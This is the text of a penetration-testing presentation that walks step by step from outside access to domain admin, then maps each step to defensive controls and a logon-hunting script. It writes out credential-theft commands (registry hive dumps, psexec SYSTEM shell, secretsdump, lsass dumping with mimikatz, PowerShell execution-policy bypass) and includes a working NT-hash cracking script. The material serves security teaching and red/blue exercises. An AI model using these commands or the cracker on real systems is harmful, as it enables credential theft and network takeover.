With global information security spending rapidly approaching $100 billion, you'd think we'd have a pretty good handle on preventing data breaches by now. However, considering that nearly 1 billion records have been exposed in the 5000+ data breaches publicly disclosed since 2005, you're probably asking yourself the same question as security and risk management professionals all over the world: How does this keep happening? This presentation will walk you through a penetration tester's process, step-by-step, as the tester goes from unauthorized outsider to domain admin (without being detected). More importantly, we'll discuss the fundamental security controls that will shut down attackers time and again.
13. STEP 4: DUMP SAM/SYSTEM/SECURITY HIVES
Dump the hives
reg.exe save hklm\sam c:\sam.save
reg.exe save hklm\system c:\system.save
reg.exe save hklm\security c:\security.save
Saving these hives (SAM and SECURITY in particular) may require elevated privileges
If an elevated prompt is not enough, run psexec.exe -i -s cmd.exe to get a SYSTEM shell, then execute the commands within the new command prompt window
While you're there, scope out users & groups
net user /domain > domain_users.txt
net group /domain > domain_groups.txt
Exfiltrate
Box, Dropbox, Google Drive, OneDrive, ShareFile
14. STEP 5: EXTRACT HASHES AND GET CRACKING
Extract hashes with Impacket (offline)
https://github.com/CoreSecurity/impacket
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Crack SAM hashes
LM -> Ophcrack (an LM field of aad3b435b51404eeaad3b435b51404ee is the hash of the empty password; it means LM hashing is disabled and there is nothing to crack there)
NT -> hashcat or John the Ripper
HashKiller (online lookup; do not submit a client's hashes to a third-party site without their agreement)
https://hashkiller.co.uk/ntlm-decrypter.aspx
Crack domain creds
hashcat or John the Ripper
15. STEP 6: IDENTIFY ADMIN ACCOUNTS
Impacket output
Administrator = RID 500 ("the dash 500 account"); the built-in Administrator keeps RID 500 even when it has been renamed, so look at the RID, not the name
Verify Local Admins
net localgroup administrators
Dump Active Directory
AD Users and Computers
Apache Directory Studio
Softerra LDAP Administrator/Browser
LDAP Admin (portable?)
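The offline part of Steps 5 and 6, as an added example (not the presenter's code and not Impacket's): it parses secretsdump.py-style `user:rid:lmhash:nthash:::` lines, flags the empty-LM value and the RID 500 account regardless of its name, and runs a dictionary attack on the NT hashes. NT hashes are unsalted MD4 over the UTF-16LE password, and because OpenSSL 3 moves MD4 to a legacy provider, the block carries its own MD4 rather than relying on hashlib. The sample hash lines and the wordlist are constructed; the svc_backup hash is a placeholder, not a real hash.

```python
"""Parse secretsdump-style SAM output, flag the RID 500 account, and crack
NT hashes against a wordlist. Added example; the SAMPLE text below is
constructed and the svc_backup hash is a placeholder, not a real value."""
import struct

MASK = 0xFFFFFFFF
# LM hash of the empty password: present whenever LM hashing is disabled
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented here because hashlib.new('md4') is often
    unavailable on OpenSSL 3 builds."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        s = list(h)
        for f, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                # compute the 'a' slot, then rotate so the next step works on d,a,b,c
                s[0] = _rotl((s[0] + f(s[1], s[2], s[3]) + X[idx] + k) & MASK, shifts[i % 4])
                s = [s[3], s[0], s[1], s[2]]
        h = [(a + b) & MASK for a, b in zip(h, s)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4 of the UTF-16LE password, no salt: one MD4 per guess
    covers every account in the dump."""
    return md4(password.encode("utf-16-le")).hex()


def parse_secretsdump(text: str) -> list:
    """Parse 'user:rid:lmhash:nthash:::' lines; banner lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower(),
                        "lm_disabled": parts[2].lower() == EMPTY_LM})
    return entries


def builtin_admin(entries):
    """The built-in Administrator is RID 500 even if it has been renamed."""
    return next((e for e in entries if e["rid"] == 500), None)


def crack_nt(entries, wordlist):
    """Dictionary attack: hash each candidate once, then look up every dumped NT hash."""
    lookup = {nt_hash(w): w for w in wordlist}
    return {e["user"]: lookup[e["nt"]] for e in entries if e["nt"] in lookup}


# Constructed sample in secretsdump.py's LOCAL output format (not from a real host)
SAMPLE = """\
[*] Target system bootKey: 0x0000000000000000000000000000000000
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
WORDLIST = ["", "password", "Password1", "Summer2016!"]  # constructed

if __name__ == "__main__":
    entries = parse_secretsdump(SAMPLE)
    print("RID 500 account:", builtin_admin(entries)["user"])
    for user, pw in crack_nt(entries, WORDLIST).items():
        print(f"cracked {user}: {pw!r}")
```

Running it reports Administrator as the RID 500 account and cracks Administrator ("password") and Guest (empty); svc_backup stays uncracked, which is the normal outcome for anything not in the list and the point at which you hand the hash to hashcat or John with real rules.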
16. STEP 7: FIND ACTIVE DA LOGINS
PowerShell Empire
https://github.com/PowerShellMafia/PowerSploit
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
Invoke-UserHunter (PowerView, in the PowerSploit Recon module): finds which hosts the target users are currently logged on to
Input options
Individual username
List of usernames
Domain group
List of hosts
PowerShell ProTip
powershell -exec bypass (short for -ExecutionPolicy Bypass; the execution policy is not a security boundary, so do not rely on it as a control)
17. STEP 8: PASS THE HASH
Invoke-TheHash
https://github.com/Kevin-Robertson/Invoke-TheHash
Dump lsass (Local Security Authority Subsystem Service)
Start > Run > taskmgr.exe
Show processes from all users
lsass.exe > Right Click > Create dump file
c:\Users\<username>\AppData\Local\Temp\lsass.DMP
Grab passwords from lsass
Online (on the target) -> procdump.exe writes the lsass dump
https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Offline -> mimikatz reads credentials out of the dump (sekurlsa::minidump, then sekurlsa::logonpasswords)
https://github.com/gentilkiwi/mimikatz
19. NOTHING NEW UNDER THE SUN
Dumping Windows Credentials (December 20, 2013)
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/
I Hunt Sys Admins (January 19, 2015)
http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
Password Spraying Outlook Web Access (February 17, 2016)
http://www.blackhillsinfosec.com/?p=4694
22. COMMON SENSE SECURITY FRAMEWORK
Seven (7) Areas of Protection
Protect Your Applications
Protect Your Endpoints
Protect Your Network
Protect Your Servers
Protect Your Data
Protect Your Locations
Protect Your People
Three (3) Yes/No Questions per Area
Guidance (free, open source, commercial)
https://commonsenseframework.org/
25. EVERY BREATH YOU TAKE… EVERY MOVE YOU MAKE…
Step -> Control
Gather OSINT -> S01 - Do you follow documented system hardening procedures to secure your servers?
Score Some Creds -> D02 - Do you periodically review employee account security to ensure that access is appropriate (i.e., least privilege, individual accounts, strong passwords)?
Logon to an Internal System -> N03 - Do you require two factor authentication for remote/VPN access, as well as access to third party (hosted) applications?
Dump SAM/System/Security Hives -> S02 - Do you centrally store and actively monitor critical security logs for suspicious events (such as abnormal admin account activity)?
Extract Hashes and Get Cracking -> See S02
Identify Admin Accounts -> E02 - Do you limit local administrator account usage?
Find Active DA Logins -> See S02
Pass the Hash -> See S02
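What "actively monitor critical security logs for abnormal admin account activity" (S02) looks like against Steps 6 to 8, as an added example that is not part of the presentation: a small hunt over centralised Security event 4624 (successful logon) records. Three rules are applied: a Domain Admin logging on to a host outside tier 0 (the condition Invoke-UserHunter exploits), an NTLM network logon for an admin from outside the management subnet (the shape a pass-the-hash logon takes on the target), and the RID 500 account used over the network (E02). The event field names are the real 4624 fields; the accounts, SIDs, host names, subnets and event lines are constructed, and the tier-0 host list and management network are assumptions to replace with your own inventory.

```python
"""Hunt for abnormal admin logons in exported Windows Security 4624 events.
Added example; SAMPLE_EVENTS, the host/account names and the networks are
constructed, not real telemetry."""
import ipaddress

DOMAIN_ADMINS = {"da_jsmith", "da_backup"}        # assumption: from net group "Domain Admins" /domain
TIER0_HOSTS = {"DC01", "DC02", "PAW01"}            # assumption: DCs and privileged access workstations
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")   # assumption: where admin tooling legitimately lives

# Constructed key=value exports of 4624/4634 events (not from a real SIEM)
SAMPLE_EVENTS = [
    "EventID=4624 Computer=DC01.corp.local TargetUserName=da_jsmith TargetUserSid=S-1-5-21-1-2-3-1105 LogonType=10 AuthenticationPackageName=Negotiate IpAddress=10.10.0.15",
    "EventID=4624 Computer=WKS-042.corp.local TargetUserName=da_jsmith TargetUserSid=S-1-5-21-1-2-3-1105 LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.20.5.77",
    "EventID=4624 Computer=FS01.corp.local TargetUserName=Administrator TargetUserSid=S-1-5-21-1-2-3-500 LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.20.5.77",
    "EventID=4624 Computer=WKS-017.corp.local TargetUserName=bob TargetUserSid=S-1-5-21-1-2-3-1203 LogonType=2 AuthenticationPackageName=Kerberos IpAddress=-",
    "EventID=4634 Computer=WKS-042.corp.local TargetUserName=da_jsmith TargetUserSid=S-1-5-21-1-2-3-1105 LogonType=3",
]


def parse_event(line: str) -> dict:
    """One 'k=v k=v ...' line into a dict of 4624 fields."""
    return dict(field.split("=", 1) for field in line.split())


def _outside_mgmt(ip: str) -> bool:
    """True for a routable source outside MGMT_NET; '-' and blanks (local logons) are not flagged."""
    try:
        return ipaddress.ip_address(ip) not in MGMT_NET
    except ValueError:
        return False


def hunt(lines):
    """Return (user, host, reason) findings for the three rules described above."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4624":
            continue
        user = ev["TargetUserName"].lower()
        host = ev["Computer"].split(".")[0].upper()
        ltype = int(ev["LogonType"])
        src = ev.get("IpAddress", "-")
        # Rule A: DA credentials exposed on a host outside tier 0 (what Invoke-UserHunter looks for)
        if user in DOMAIN_ADMINS and host not in TIER0_HOSTS:
            findings.append((user, host, "domain admin logon on non-tier-0 host"))
        # Rule B: NTLM network logon (type 3) for an admin from outside the management net.
        # PtH tools authenticate this way; NTLM type 3 logons also occur legitimately, so
        # treat this as a hunting lead to pivot on, not proof by itself.
        if (user in DOMAIN_ADMINS and ltype == 3
                and ev.get("AuthenticationPackageName") == "NTLM" and _outside_mgmt(src)):
            findings.append((user, host, f"NTLM network logon from {src}"))
        # Rule C: the built-in Administrator (RID 500 of the domain or the machine) used over
        # the network, whatever it has been renamed to (control E02)
        if ev.get("TargetUserSid", "").endswith("-500") and ltype == 3:
            findings.append((user, host, "RID 500 account used over the network"))
    return findings


if __name__ == "__main__":
    for user, host, reason in hunt(SAMPLE_EVENTS):
        print(f"{host:<8} {user:<14} {reason}")
```

On the sample, the RDP logon by da_jsmith to DC01 from the management subnet is silent, the same account's NTLM logon to WKS-042 from 10.20.5.77 trips rules A and B, and the RID 500 logon to FS01 trips rule C; the logoff event is ignored. The per-rule comments matter in production: rule B in particular needs tuning to the environment's normal NTLM usage before it becomes an alert rather than a hunt query.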
28. LEADERSHIP NEEDS CONTEXT
Information Security Spending Will Top $101 Billion By 2020
http://www.darkreading.com/operations/information-security-spending-will-top-$101-billion-by-2020/d/d-id/1327178
World's Biggest Data Breaches
http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
Privacy Rights Clearinghouse's Chronology of Data Breaches
https://www.privacyrights.org/data-breaches
Verizon Data Breach Investigations Report (DBIR)
http://www.verizonenterprise.com/verizon-insights-lab/dbir/
29. YOUR HOMEWORK
Self-assess your organization against the CSSF
Schedule a red team / blue team exercise using these steps as a guide
Post mortem the exercise
Update policies, procedures, and standards based on the post mortem
Sit down with leadership (steering committee) and share what you learned
Fix all the things!